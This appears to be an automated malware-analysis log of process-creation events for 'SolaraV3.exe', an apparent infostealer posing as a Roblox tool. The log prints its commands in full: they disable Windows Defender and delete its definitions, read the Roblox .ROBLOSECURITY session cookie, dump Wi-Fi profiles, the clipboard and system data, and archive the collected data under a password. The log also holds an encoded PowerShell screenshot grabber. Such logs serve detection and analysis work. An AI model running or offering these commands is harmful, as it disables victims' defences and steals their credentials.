Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()""	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESF203.tmp" "c:\Users\user\AppData\Local\Temp\se3yji4z\CSC9CC35FFA2F54059AD6E143F6E3C2E84.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia	Jump to behavior
